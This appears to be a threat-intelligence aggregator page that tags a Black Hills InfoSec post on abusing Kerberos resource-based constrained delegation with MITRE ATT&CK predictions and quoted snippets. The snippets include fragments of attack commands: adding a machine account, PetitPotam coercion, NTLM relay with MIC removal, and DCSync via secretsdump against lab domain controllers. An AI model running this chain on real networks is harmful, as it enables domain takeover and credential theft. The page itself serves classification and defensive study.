TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Black Hills InfoSec

Abusing Delegation with Impacket (Part 3): Resource-Based Constrained Delegation

BHIS · 2025-11-26 · Read original ↗

ATT&CK techniques detected

22 predictions
T1557.001Name Resolution Poisoning and SMB Relay
79%
“and configure rbcd cve - 2019 - 1040 ( drop the mic ) bypasses smb signing. by effectively “ dropping the mic ” during smb authentication, vulnerable hosts still accept connections even if they ’ re being relayed by an attacker. this can be leveraged to pivot protocols, like coer…”
T1550.003Pass the Ticket
72%
“' 5. export the ticket into memory export krb5ccname = administrator @ [ email protected ] 6. perform a dcsync against dc01 as administrator impacket - secretsdump - k dc01. secure. local 3. add a user spn and configure rbcd with genericwrite assume we ’ ve compromised the user d…”
T1558Steal or Forge Kerberos Tickets
66%
“with known vulnerabilities, overly powerful permissions, or other external factors, it becomes far more valuable! references - https : / / shenaniganslabs. io / 2019 / 01 / 28 / wagging - the - dog. html # a - forwardable - result - https : / / www. thehacker. recipes / ad / move…”
T1550.003Pass the Ticket
64%
“constrained delegation, but the resource itself controls which accounts can delegate to it. by default, a domain account can configure rbcd on themselves or any resource they control. this approach lets the service decide who may delegate to it instead of the domain. resource - b…”
T1550.003Pass the Ticket
62%
“. 202 - - delegate - access - - remove - mic 3. force the second dc ( 10. 0. 1. 203 ) to authenticate to us ( 10. 0. 1. 13 ) python3 petitpotam. py - u ' user. one ' - p ' password1! ' - d ' insecure. local ' 10. 0. 1. 13 10. 0. 1. 203 4. if successful, ntlmrelayx will authentica…”
T1558Steal or Forge Kerberos Tickets
57%
“abusing delegation with impacket ( part 3 ) : resource - based constrained delegation abusing delegation with impacket ( part 3 ) : resource - based constrained delegation hunter recently graduated with his master ’ s degree in cyber defense and has over two years of experience i…”
T1003.006DCSync
56%
“_ / ' 6. export the ticket into memory export krb5ccname = administrator @ [ email protected ] 7. perform a dcsync against dc02 as administrator impacket - secretsdump - k dc02. insecure. local 7. ( cleanup ) : remove the added machine account ( can only be done with administrati…”
T1557.001Name Resolution Poisoning and SMB Relay
56%
“level steps are : - compromise a user or machine in the domain. - identify a domain controller vulnerable to cve - 2019 - 1040. - coerce a second domain controller to authenticate to the attacker. - drop the mic and relay authentication to ldap on the vulnerable domain controller…”
T1558Steal or Forge Kerberos Tickets
54%
“. io / s4fuckme2selfanduandu2proxy - a - low - dive - into - kerberos - delegations / - https : / / mayfly277. github. io / posts / goadv2 - pwning - part10 / - https : / / shenaniganslabs. io / 2019 / 01 / 28 / wagging - the - dog. html - https : / / www. tiraniddo. dev / 2022 /…”
T1558.001Golden Ticket
47%
“collection all 2. add a new computer called machine $ using machine account quota impacket - addcomputer - computer - name ' machine $ ' - computer - pass ' machinepass! ' - dc - host 10. 0. 1. 200 ' secure. local / dacluser ' : ' password3 # ' 3. configure dc01 $ to trust machin…”
T1558.001Golden Ticket
45%
“has the “ write all properties ” ( genericwrite ) permission over an active directory object, such user can configure resource based constrained delegation to trust any user / machine for delegation. to escalate in the domain, we can simply configure rbcd on dc01 $ to trust a mac…”
T1550.003Pass the Ticket
45%
“abusing delegation with impacket ( part 3 ) : resource - based constrained delegation abusing delegation with impacket ( part 3 ) : resource - based constrained delegation hunter recently graduated with his master ’ s degree in cyber defense and has over two years of experience i…”
T1550.003Pass the Ticket
44%
“with known vulnerabilities, overly powerful permissions, or other external factors, it becomes far more valuable! references - https : / / shenaniganslabs. io / 2019 / 01 / 28 / wagging - the - dog. html # a - forwardable - result - https : / / www. thehacker. recipes / ad / move…”
T1558Steal or Forge Kerberos Tickets
44%
“' 5. export the ticket into memory export krb5ccname = administrator @ [ email protected ] 6. perform a dcsync against dc01 as administrator impacket - secretsdump - k dc01. secure. local 3. add a user spn and configure rbcd with genericwrite assume we ’ ve compromised the user d…”
T1558.001Golden Ticket
43%
“compromise a user or machine with genericwrite permissions over an object. - add an spn to a compromised user if needed. - configure the affected object to trust the compromised user for delegation. - use s4u2self and s4u2proxy to obtain a service ticket as an elevated user to th…”
T1558Steal or Forge Kerberos Tickets
42%
“compromise a user or machine with genericwrite permissions over an object. - add an spn to a compromised user if needed. - configure the affected object to trust the compromised user for delegation. - use s4u2self and s4u2proxy to obtain a service ticket as an elevated user to th…”
T1187Forced Authentication
42%
“and configure rbcd cve - 2019 - 1040 ( drop the mic ) bypasses smb signing. by effectively “ dropping the mic ” during smb authentication, vulnerable hosts still accept connections even if they ’ re being relayed by an attacker. this can be leveraged to pivot protocols, like coer…”
T1098Account Manipulation
38%
“_ / ' 6. export the ticket into memory export krb5ccname = administrator @ [ email protected ] 7. perform a dcsync against dc02 as administrator impacket - secretsdump - k dc02. insecure. local 7. ( cleanup ) : remove the added machine account ( can only be done with administrati…”
T1187Forced Authentication
36%
“level steps are : - compromise a user or machine in the domain. - identify a domain controller vulnerable to cve - 2019 - 1040. - coerce a second domain controller to authenticate to the attacker. - drop the mic and relay authentication to ldap on the vulnerable domain controller…”
T1550.003Pass the Ticket
34%
“’ t one already ( dacl. secure. local ) python3 addspn. py - u secure. local \ dacluser - p ' password3 # ' - s host / dacl. secure. local - - target - type samname 10. 0. 1. 200 3. using dacluser ’ s credentials, we can obtain a service ticket as the domain administrator to dc01…”
T1550.003Pass the Ticket
33%
“collection all 2. add a new computer called machine $ using machine account quota impacket - addcomputer - computer - name ' machine $ ' - computer - pass ' machinepass! ' - dc - host 10. 0. 1. 200 ' secure. local / dacluser ' : ' password3 # ' 3. configure dc01 $ to trust machin…”
T1558Steal or Forge Kerberos Tickets
32%
“has the “ write all properties ” ( genericwrite ) permission over an active directory object, such user can configure resource based constrained delegation to trust any user / machine for delegation. to escalate in the domain, we can simply configure rbcd on dc01 $ to trust a mac…”

Summary

This is the third in a three-part series of blog posts discussing how to abuse Kerberos delegation! If you haven't already, feel free to read the first blog post, as they discuss the Kerberos authentication process and how delegation plays an important role in solving the double-hop problem, and how to abuse unconstrained delegation.

The post Abusing Delegation with Impacket (Part 3): Resource-Based Constrained Delegation appeared first on Black Hills Information Security, Inc..